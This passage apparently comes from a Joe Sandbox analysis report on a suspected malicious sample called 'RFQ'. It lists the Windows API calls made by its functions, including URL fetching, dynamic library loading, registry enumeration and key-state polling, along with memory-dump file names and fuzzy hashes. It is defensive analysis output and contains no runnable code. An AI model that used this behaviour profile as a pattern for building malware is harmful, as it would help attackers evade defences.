• SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 007702B1
• GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 007702C2
• SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00770344
Strings
Memory Dump Source
• Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
Similarity
• API ID: ErrorMode$AddressCreateInstanceProc
• String ID: DllGetClassObject
• API String ID: 753597075-1075368562
APIs
• _memset.LIBCMT ref: 00775075
• GetMenuItemInfoW.USER32 ref: 00775091
• DeleteMenu.USER32(00000004,00000007,00000000), ref: 007750D7
• DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,007F1708,00000000), ref: 00775120
Strings
Memory Dump Source
• Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
Similarity
• API ID: Menu$Delete$InfoItem_memset
• String ID: 0
• API String ID: 1173514356-4108050209
APIs
• CharLowerBuffW.USER32(?,?,?,?), ref: 00790587
Strings
Memory Dump Source
• Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
Similarity
• API ID: BuffCharLower
• String ID: cdecl$none$stdcall$winapi
• API String ID: 2358735015-567219261
APIs
• SendMessageW.USER32(?,00000188,00000000,00000000), ref: 0076B88E
• SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 0076B8A1
• SendMessageW.USER32(?,00000189,?,00000000), ref: 0076B8D1
Strings
Memory Dump Source
• Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
Similarity
• API ID: MessageSend
• String ID: ComboBox$ListBox
• API String ID: 3850602802-1403004172
APIs
• InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00784401
• HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00784427
• HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00784457
• InternetCloseHandle.WININET(00000000), ref: 0078449E
  • Part of subcall function 00785052: GetLastError.KERNEL32(?,?,007843CC,00000000,00000000,00000001), ref: 00785067
Strings
Memory Dump Source
• Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
Similarity
• API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
• String ID:
• API String ID: 1951874230-3916222277
APIs
  • Part of subcall function 0074D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0074D1BA
  • Part of subcall function 0074D17C: GetStockObject.GDI32(00000011), ref: 0074D1CE
  • Part of subcall function 0074D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0074D1D8
• SendMessageW.USER32(00000000,00000467,00000000,?), ref: 0079915C
• LoadLibraryW.KERNEL32(?), ref: 00799163
• SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00799178
• DestroyWindow.USER32(?), ref: 00799180
Strings
Memory Dump Source
• Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
Similarity
• API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
• String ID: SysAnimate32
• API String ID: 4146253029-1011021900
APIs
• GetStdHandle.KERNEL32(0000000C), ref: 00779588
• CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 007795B9
• GetStdHandle.KERNEL32(0000000C), ref: 007795CB
• CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00779605
Strings
Memory Dump Source
• Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
Similarity
• API ID: CreateHandle$FilePipe
• String ID: nul
• API String ID: 4209266947-2873401336
                                                                                                                                                    • Opcode ID: 7390ab20b3dfaa2fcad4beec68bfb4d94edae0899bc7842c1b1c00c7fd481b6c
                                                                                                                                                    • Instruction ID: bc32237c3e43a34c055850a1dc13149d505e0fe4bc664eb79546e2a2c70fe082
                                                                                                                                                    • Opcode Fuzzy Hash: 7390ab20b3dfaa2fcad4beec68bfb4d94edae0899bc7842c1b1c00c7fd481b6c
                                                                                                                                                    • Instruction Fuzzy Hash: C121B270501216ABDF219F25DC05E9A7BF4BF443A4F208A19FAA9D72D0D778DD60CB20
APIs
• GetStdHandle.KERNEL32(000000F6), ref: 00779653
• CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00779683
• GetStdHandle.KERNEL32(000000F6), ref: 00779694
• CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 007796CE
Strings
Memory Dump Source
• Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
Similarity
• API ID: CreateHandle$FilePipe
• String ID: nul
• API String ID: 4209266947-2873401336
• Opcode ID: 8314a7d296a98fa28961b4ed65f65fdacc2ef778ccb7a2e17154f116b68418c0
• Instruction ID: 6874b5f097f8e241bd8de9832c9c4dd42cd4ca857161ec9da0c981cd574329f7
• Opcode Fuzzy Hash: 8314a7d296a98fa28961b4ed65f65fdacc2ef778ccb7a2e17154f116b68418c0
• Instruction Fuzzy Hash: B221A1715012059BDF209F698C05E9A77F8AF457B4F208B18FAA5E72D0E7789851CB14
APIs
• SetErrorMode.KERNEL32(00000001), ref: 0077DB0A
• GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0077DB5E
• __swprintf.LIBCMT ref: 0077DB77
• SetErrorMode.KERNEL32(00000000,00000001,00000000,007CDC00), ref: 0077DBB5
Strings
Memory Dump Source
• Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
Similarity
• API ID: ErrorMode$InformationVolume__swprintf
• String ID: %lu
• API String ID: 3164766367-685833217
• Opcode ID: 48e3b16d2e3bfa11a08c95ab4352705e5834377e19e73df3756630b933da2ab5
• Instruction ID: 0a16014590284f04911a6294b9dabfb9d687f3b667d6d939fa9f5beb0ef279df
• Opcode Fuzzy Hash: 48e3b16d2e3bfa11a08c95ab4352705e5834377e19e73df3756630b933da2ab5
• Instruction Fuzzy Hash: 6F217175600108EFDB10EF64C989EAEB7B9EF48704B118069F509E7251DB79EE01CB60
APIs
  • Part of subcall function 0076C82D: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0076C84A
  • Part of subcall function 0076C82D: GetWindowThreadProcessId.USER32(?,00000000), ref: 0076C85D
  • Part of subcall function 0076C82D: GetCurrentThreadId.KERNEL32 ref: 0076C864
  • Part of subcall function 0076C82D: AttachThreadInput.USER32(00000000), ref: 0076C86B
• GetFocus.USER32 ref: 0076CA05
  • Part of subcall function 0076C876: GetParent.USER32(?), ref: 0076C884
• GetClassNameW.USER32(?,?,00000100), ref: 0076CA4E
• EnumChildWindows.USER32(?,0076CAC4), ref: 0076CA76
• __swprintf.LIBCMT ref: 0076CA90
Strings
Memory Dump Source
• Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
Similarity
• API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf
• String ID: %s%d
• API String ID: 3187004680-1110647743
• Opcode ID: 45aecf12f7fe5931d0c17cde61c06dcd500a07e5a28975f936b51a89e35537bf
• Instruction ID: 24e210fbcb28b43d041d041845f63452d16ff3834f9ab511e5291e4d56f4b82e
• Opcode Fuzzy Hash: 45aecf12f7fe5931d0c17cde61c06dcd500a07e5a28975f936b51a89e35537bf
• Instruction Fuzzy Hash: 971145B5500209BBDB22BF949C89FF93768AF44714F00C065FD59AA142DB789945DB70
APIs
• __lock.LIBCMT ref: 00757AD8
  • Part of subcall function 00757CF4: __mtinitlocknum.LIBCMT ref: 00757D06
  • Part of subcall function 00757CF4: EnterCriticalSection.KERNEL32(00000000,?,00757ADD,0000000D), ref: 00757D1F
• InterlockedIncrement.KERNEL32(?), ref: 00757AE5
• __lock.LIBCMT ref: 00757AF9
• ___addlocaleref.LIBCMT ref: 00757B17
Strings
Memory Dump Source
• Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
Similarity
• API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
• String ID: `{
• API String ID: 1687444384-2310148178
• Opcode ID: 0646a1ebb2e9d648222b2990be8e95e61eb4e391eab742a559932042d8303bd8
• Instruction ID: 93ae220dda0c99be648b1cc6b48e96544c791c25cb58ad756843521bbd153d00
• Opcode Fuzzy Hash: 0646a1ebb2e9d648222b2990be8e95e61eb4e391eab742a559932042d8303bd8
• Instruction Fuzzy Hash: 240184B1505B00DFD720DF75D909789B7F0EF54322F20894EE896976A0CBF8A648CB55
APIs
• OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 007919F3
• GetProcessIoCounters.KERNEL32(00000000,?), ref: 00791A26
• GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00791B49
• CloseHandle.KERNEL32(?), ref: 00791BBF
Memory Dump Source
• Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
Similarity
• API ID: Process$CloseCountersHandleInfoMemoryOpen
• String ID:
• API String ID: 2364364464-0
• Opcode ID: e7c80145b897a1fecf4b9b36b8a27200cb49c4135d1451d846776e7c3094f8f0
• Instruction ID: 5781fb1e9e1d693bd17767f935fce0fa8288059362be88a253e1a4cd435bcd00
• Opcode Fuzzy Hash: e7c80145b897a1fecf4b9b36b8a27200cb49c4135d1451d846776e7c3094f8f0
• Instruction Fuzzy Hash: 9E8163B0600205EBDF11AF64C88ABADBBE5EF04720F54C459F905AF382D7B8AD51CB90
APIs
• SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0079E1D5
• SendMessageW.USER32(?,000000B0,?,?), ref: 0079E20D
• IsDlgButtonChecked.USER32(?,00000001), ref: 0079E248
• GetWindowLongW.USER32(?,000000EC), ref: 0079E269
• SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0079E281
Memory Dump Source
• Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
Similarity
• API ID: MessageSend$ButtonCheckedLongWindow
• String ID:
• API String ID: 3188977179-0
• Opcode ID: 1525664f6cd8844ca9c8b9d51a7c1470611e5500e5b75c0323142cb9feae0344
• Instruction ID: 7c1b694d7ee46130024783164916150a57f043cdcf2440ab739b4cab0f8d3e62
• Opcode Fuzzy Hash: 1525664f6cd8844ca9c8b9d51a7c1470611e5500e5b75c0323142cb9feae0344
• Instruction Fuzzy Hash: F4618E34A40648EFDF20CF58D895FAA77BAAB49310F1480A9E959973A1C778AD40CB11
                                                                                                                                                    APIs
                                                                                                                                                    • VariantInit.OLEAUT32(?), ref: 00771CB4
                                                                                                                                                    • VariantClear.OLEAUT32(00000013), ref: 00771D26
                                                                                                                                                    • VariantClear.OLEAUT32(00000000), ref: 00771D81
                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 00771DF8
                                                                                                                                                    • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00771E26
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Variant$Clear$ChangeInitType
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4136290138-0
                                                                                                                                                    • Opcode ID: 49852d6eb0f3bad38d96ea185e9d5da74771ee1d31f44d0162e8c19a0b5ef5aa
                                                                                                                                                    • Instruction ID: 88467d4ec627f0b13c1432274f7153812b4b3a0c693edcd292e01ef47e42c867
                                                                                                                                                    • Opcode Fuzzy Hash: 49852d6eb0f3bad38d96ea185e9d5da74771ee1d31f44d0162e8c19a0b5ef5aa
                                                                                                                                                    • Instruction Fuzzy Hash: 9D5156B5A00209AFDB24CF58C884EAAB7B8FF4C354B158559ED59DB304E734EA11CFA0
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 0073936C: __swprintf.LIBCMT ref: 007393AB
                                                                                                                                                      • Part of subcall function 0073936C: __itow.LIBCMT ref: 007393DF
                                                                                                                                                    • LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 007906EE
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 0079077D
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 0079079B
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 007907E1
                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,00000004), ref: 007907FB
                                                                                                                                                      • Part of subcall function 0074E65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,0077A574,?,?,00000000,00000008), ref: 0074E675
                                                                                                                                                      • Part of subcall function 0074E65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,0077A574,?,?,00000000,00000008), ref: 0074E699
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 327935632-0
                                                                                                                                                    • Opcode ID: 4a8cd6c394cf69e904ab963118fe1d661414b50972beb28e689c45cc3e8c692a
                                                                                                                                                    • Instruction ID: 01c4b387d00f9052ac172c34df28fcd1427365ea65ee69b0199597e18a8c5fd0
                                                                                                                                                    • Opcode Fuzzy Hash: 4a8cd6c394cf69e904ab963118fe1d661414b50972beb28e689c45cc3e8c692a
                                                                                                                                                    • Instruction Fuzzy Hash: D0512775A00209DFDF10EFA8D885DADB7B5BF48320F058059EA15AB352DB38ED45CB81
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00793C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00792BB5,?,?), ref: 00793C1D
                                                                                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00792EEF
                                                                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00792F2E
                                                                                                                                                    • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00792F75
                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?), ref: 00792FA1
                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00792FAE
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Close$BuffCharConnectEnumOpenRegistryUpper
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3740051246-0
                                                                                                                                                    • Opcode ID: c8cc684374ac9d54c039dfea962acc650b0fa0f72d70fdddfc5e42f7c2c9e04e
                                                                                                                                                    • Instruction ID: 1d2825e352c2703b5df01c9259f1ceb209cc0f06768449493aa153719f4f2a89
                                                                                                                                                    • Opcode Fuzzy Hash: c8cc684374ac9d54c039dfea962acc650b0fa0f72d70fdddfc5e42f7c2c9e04e
                                                                                                                                                    • Instruction Fuzzy Hash: B4515C72208204EFDB15EF54D885EAAB7F9FF88304F04891DF59597292EB38E905CB52
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: a1353f0bdb0956d39c515055ad8dd2652dfbf046f2579bcc6c53eda6ce74be86
                                                                                                                                                    • Instruction ID: b41ccbaf0aee843df4f5582266b9600eb1fd2f7f29b92a1da1f346a631ec1fe1
                                                                                                                                                    • Opcode Fuzzy Hash: a1353f0bdb0956d39c515055ad8dd2652dfbf046f2579bcc6c53eda6ce74be86
                                                                                                                                                    • Instruction Fuzzy Hash: 7041E679A00104EFCF22DF68EC48FA9BF68EB09350F144265F95AE72D1D738AD01DA54
                                                                                                                                                    APIs
                                                                                                                                                    • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 007812B4
                                                                                                                                                    • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 007812DD
                                                                                                                                                    • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0078131C
                                                                                                                                                      • Part of subcall function 0073936C: __swprintf.LIBCMT ref: 007393AB
                                                                                                                                                      • Part of subcall function 0073936C: __itow.LIBCMT ref: 007393DF
                                                                                                                                                    • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00781341
                                                                                                                                                    • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00781349
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1389676194-0
                                                                                                                                                    • Opcode ID: e0e1e6466188e6e973125f439acc614c3e5918a0f2b7831412a11d9ef5cfa420
                                                                                                                                                    • Instruction ID: a036b596fd82059c5efd66c1ab551f0c11235bb4201c32e9daf1d1b783705db4
                                                                                                                                                    • Opcode Fuzzy Hash: e0e1e6466188e6e973125f439acc614c3e5918a0f2b7831412a11d9ef5cfa420
                                                                                                                                                    • Instruction Fuzzy Hash: 2C41F975A00105DFDB05EF64C995AAEBBF5FF08310B148099E90AAB362DB35ED01DB51
                                                                                                                                                    APIs
                                                                                                                                                    • GetCursorPos.USER32(000000FF), ref: 0074B64F
                                                                                                                                                    • ScreenToClient.USER32(00000000,000000FF), ref: 0074B66C
                                                                                                                                                    • GetAsyncKeyState.USER32(00000001), ref: 0074B691
